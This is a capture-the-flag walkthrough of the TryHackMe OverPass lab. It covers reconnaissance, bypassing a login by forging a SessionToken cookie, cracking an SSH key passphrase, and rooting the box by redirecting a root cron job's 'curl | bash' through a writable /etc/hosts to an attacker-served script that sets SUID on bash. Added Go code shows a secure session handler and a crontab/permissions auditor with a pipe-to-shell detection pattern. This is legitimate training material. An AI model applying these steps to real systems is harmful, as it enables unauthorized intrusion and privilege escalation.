TryHackMe: OverPass

TryHackMe Room: https://tryhackme.com/room/overpass
New Day, New Room. Today we are attempting the OverPass room.

I boot up my AttackBox and the target machine; the machine in question is 10.10.224.184.

First, I do a preliminary nmap scan:

root@ip-x-x-x-x:~# nmap -sV 10.10.224.184
Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-09 15:57 BST
Nmap scan report for ip-10-10-224-184.eu-west-1.compute.internal (10.10.224.184)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
MAC Address: 02:D2:A2:85:F6:47 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds

We can see we have a way in for SSH access on port 22, and we also have a webserver running on port 80. I browse around the website but do not really see anything too interesting. There are some downloads and source code for a password-to-file application. Next, let’s fire up gobuster to see if we have any common directories:

root@ip-x-x-x-x:~# gobuster dir --wordlist /usr/share/wordlists/dirb/common.txt -u 10.10.224.184
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url:            http://10.10.224.184
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2021/07/09 15:55:52 Starting gobuster
/aboutus (Status: 301)
/admin (Status: 301)
/css (Status: 301)
/downloads (Status: 301)
/img (Status: 301)
/index.html (Status: 301)
2021/07/09 15:55:53 Finished

The admin directory is of interest. Let’s check that out!

Simple Admin Login Page

We are greeted with an admin login page. I checked the source code to see if there were any comments left in the code but did not see anything. One interesting file with this webpage is the login.js file. It shows us that the form submits to /api/login and then returns statusOrCookie, which will be either "Incorrect credentials" or a token that is set using Cookies.set("SessionToken",statusOrCookie). This looks like a promising attack vector.

Another possible route may be SQL injection. I am going to test a common set of passwords like admin:password123 and see if that gives us anything, then try some SQL injection. If all else fails, I want to check to see if we can just set our own SessionToken and grant ourselves access.

SQL injection did not work, but setting the SessionToken cookie and refreshing so it sends over the headers did work! The admin page provides us with an SSH private key for ‘James’ and also mentions that it is crackable. First I am just going to copy the contents and see if we can log in with the key alone.
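The bypass above works because the server treats the mere presence of a SessionToken cookie as proof of login. The Go snippet below is an added example, not the Overpass server's code (its source is not on this page): weakAdmin reproduces the observed behaviour, and strongAdmin beside it only accepts tokens the server itself issued and recorded. The sessionStore type, statusWithCookie helper and handler names are my own; unlike the page's login.js, which sets the cookie client-side, issueCookie sets it server-side with HttpOnly, Secure and SameSite flags.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"sync"
)

// sessionStore holds the tokens this server issued (hypothetical type).
// Only those values are valid; anything a client makes up is rejected.
type sessionStore struct {
	mu     sync.Mutex
	tokens map[string]string // token -> username
}

func newSessionStore() *sessionStore {
	return &sessionStore{tokens: make(map[string]string)}
}

// issue mints a 256-bit random token and binds it to a user.
func (s *sessionStore) issue(user string) (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	tok := hex.EncodeToString(b)
	s.mu.Lock()
	s.tokens[tok] = user
	s.mu.Unlock()
	return tok, nil
}

// lookup returns the user bound to a token, if the server issued it.
func (s *sessionStore) lookup(tok string) (string, bool) {
	s.mu.Lock()
	defer s.mu.Unlock()
	user, ok := s.tokens[tok]
	return user, ok
}

// issueCookie is what /api/login should do once the password check passes
// (the check itself is omitted): the server sets the cookie, HttpOnly so
// page scripts never need to handle the token.
func (s *sessionStore) issueCookie(w http.ResponseWriter, user string) error {
	tok, err := s.issue(user)
	if err != nil {
		return err
	}
	http.SetCookie(w, &http.Cookie{
		Name: "SessionToken", Value: tok, Path: "/",
		HttpOnly: true, Secure: true, SameSite: http.SameSiteStrictMode,
	})
	return nil
}

// weakAdmin reproduces what the write-up observed: any SessionToken cookie,
// whatever its value, unlocks the admin page.
func weakAdmin(w http.ResponseWriter, r *http.Request) {
	if _, err := r.Cookie("SessionToken"); err != nil {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	fmt.Fprint(w, "admin panel")
}

// strongAdmin accepts only tokens present in the server-side store.
func (s *sessionStore) strongAdmin(w http.ResponseWriter, r *http.Request) {
	c, err := r.Cookie("SessionToken")
	if err != nil {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	user, ok := s.lookup(c.Value)
	if !ok {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	fmt.Fprintf(w, "admin panel for %s", user)
}

// statusWithCookie drives a handler with an optional SessionToken cookie
// and returns the HTTP status it produced.
func statusWithCookie(h http.HandlerFunc, token string) int {
	req := httptest.NewRequest(http.MethodGet, "/admin", nil)
	if token != "" {
		req.AddCookie(&http.Cookie{Name: "SessionToken", Value: token})
	}
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code
}

func main() {
	store := newSessionStore()
	issued, err := store.issue("admin")
	if err != nil {
		panic(err)
	}
	fmt.Println("forged cookie, weak handler:  ", statusWithCookie(weakAdmin, "forged"))
	fmt.Println("forged cookie, strong handler:", statusWithCookie(store.strongAdmin, "forged"))
	fmt.Println("issued cookie, strong handler:", statusWithCookie(store.strongAdmin, issued))
}
```

The detection side is the same lookup: a request carrying a SessionToken that the store has never seen is either a stale session or a forgery, and is worth logging with the source address before the 401 goes out.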

I copied the key to ~/.ssh/id_rsa and did a chmod 400 ~/.ssh/id_rsa to set permissions to read-only for us, and finally ssh -i ~/.ssh/id_rsa 10.10.224.184 to attempt to log in.

And crud:

Looks like we will be cracking the passphrase after all. First we need to convert the key to a hash using ssh2john.py, which I don’t know the location of, so a quick search will help me out:

root@ip-x-x-x-x:/usr/bin# locate "ssh2john.py"
/opt/john/ssh2john.py

Now we just use python /opt/john/ssh2john.py ~/.ssh/id_rsa > id_rsa.hash to get the hash file.

Next I did a locate rockyou to find the word list and we can use the hash file with a wordlist to crack the passphrase:

root@ip-x-x-x-x:~# john id_rsa.hash /usr/share/wordlists/rockyou.txt --format=SSH


Within a few seconds we get the passphrase! Now let’s ssh back in to james’ account.

ssh -i ~/.ssh/id_rsa james@10.10.224.184

And we can cat user.txt for the first flag!

Now we need to privesc to get root permissions.

First, I try running sudo -l to see what commands we can run as sudo, however it immediately asks us for a password that we do not know.

I am going to grab a copy of LinEnum.sh, get it onto the machine and run it to see what we have to work with:

# First, we need to get the file on our attack machine
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Next, start a web server in the dir to transfer the file (serves plain HTTP)
python -m "http.server" 3333
# Now, on the target machine, grab the file
wget http://attack-machine-ip:3333/LinEnum.sh
# Set executable
chmod +x LinEnum.sh
# Save the results out
./LinEnum.sh > results.txt
# and let's page through them
more results.txt

I’m parsing through the results and these items stand out:

  • Two admin users: syslog and tryhackme
  • Super user account root
  • The home directory of tryhackme is readable only by that user (whereas our home directory is readable by everyone)
  • The crontab executes curl overpass.thm/downloads/src/buildscript.sh | bash as root every minute
    • This is our way in. I ran a cat /etc/hosts and see that overpass.thm just points back to localhost, which means the file is here on the machine.
    • It seems like the files might be in the /root or /tryhackme folders, so we cannot get to those yet.

I went back a little and checked the perms of the hosts file with ls -la /etc/hosts, and it shows that everyone is able to read and write to hosts!! So we can create a file on our machine at the path /downloads/src/buildscript.sh and have it do what we want. The easiest thing is to chmod +s /bin/bash so that when we run it, we get root privileges.

So that’s exactly what I did! I started a python web server with python3 -m "http.server" 80 in a directory that had the folder structure of /downloads/src/buildscript.sh. Then I modified the /etc/hosts on the target machine to point overpass.thm to my attack machine’s IP. After a minute, I saw the call come in and it grabbed the file!
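The two conditions that made this possible, a root cron job piping a download into bash and a world-writable /etc/hosts, are both easy to check for before someone else does. The Go program below is an added example of such an audit; it is not part of the write-up or of LinEnum. The Finding type, auditCrontab, worldWritable and auditPath are my own names, and sampleCrontab is constructed for this example, with one line mirroring the job the write-up found on the target.

```go
package main

import (
	"bufio"
	"fmt"
	"io/fs"
	"os"
	"regexp"
	"strings"
)

// Finding is one risky configuration item (hypothetical type for this example).
type Finding struct {
	Where  string
	Detail string
}

// pipeToShell matches a download tool whose output is piped straight into a shell.
var pipeToShell = regexp.MustCompile(`\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b`)

// auditCrontab scans system-crontab text (five time fields, a user column,
// then the command) and flags every job that pipes downloaded content into a
// shell. Such a job is only as trustworthy as DNS, /etc/hosts and the transport.
func auditCrontab(text string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		fields := strings.Fields(line)
		var user, cmd string
		switch {
		case strings.HasPrefix(fields[0], "@") && len(fields) >= 3: // @reboot, @hourly, ...
			user, cmd = fields[1], strings.Join(fields[2:], " ")
		case len(fields) >= 7:
			user, cmd = fields[5], strings.Join(fields[6:], " ")
		default:
			continue // environment lines such as PATH=... carry no command
		}
		if !pipeToShell.MatchString(cmd) {
			continue
		}
		transport := "plaintext or scheme-less URL"
		if strings.Contains(cmd, "https://") {
			transport = "https"
		}
		out = append(out, Finding{
			Where:  "crontab",
			Detail: fmt.Sprintf("user %s pipes a download into a shell (%s): %s", user, transport, cmd),
		})
	}
	return out
}

// worldWritable reports whether the mode grants write to "others", the
// condition the write-up found on /etc/hosts.
func worldWritable(mode fs.FileMode) bool {
	return mode.Perm()&0o002 != 0
}

// auditPath stats a file and returns a finding if anyone can modify it.
func auditPath(path string) (*Finding, error) {
	info, err := os.Stat(path)
	if err != nil {
		return nil, err
	}
	if worldWritable(info.Mode()) {
		return &Finding{Where: path, Detail: "world-writable (" + info.Mode().Perm().String() + ")"}, nil
	}
	return nil, nil
}

// sampleCrontab is constructed for this example; the third line mirrors the
// job the write-up found on the target.
const sampleCrontab = `
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot james wget -qO- https://example.invalid/setup.sh | sh
`

func main() {
	for _, f := range auditCrontab(sampleCrontab) {
		fmt.Printf("[%s] %s\n", f.Where, f.Detail)
	}
	for _, p := range []string{"/etc/hosts", "/etc/crontab"} {
		f, err := auditPath(p)
		switch {
		case err != nil:
			fmt.Printf("[%s] skipped: %v\n", p, err)
		case f != nil:
			fmt.Printf("[%s] %s\n", f.Where, f.Detail)
		default:
			fmt.Printf("[%s] ok\n", p)
		}
	}
}
```

On a real host, run it against the contents of /etc/crontab and /etc/cron.d/* rather than the constructed sample. The fixes follow directly from the findings: restore 0644 on /etc/hosts, and replace the curl | bash job with a script that already lives on the box, or at minimum fetch over HTTPS from a pinned host and verify a checksum before executing anything.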

Now I just needed to run /bin/bash -p; whoami then said root!

cat /root/root.txt gives us the final flag.
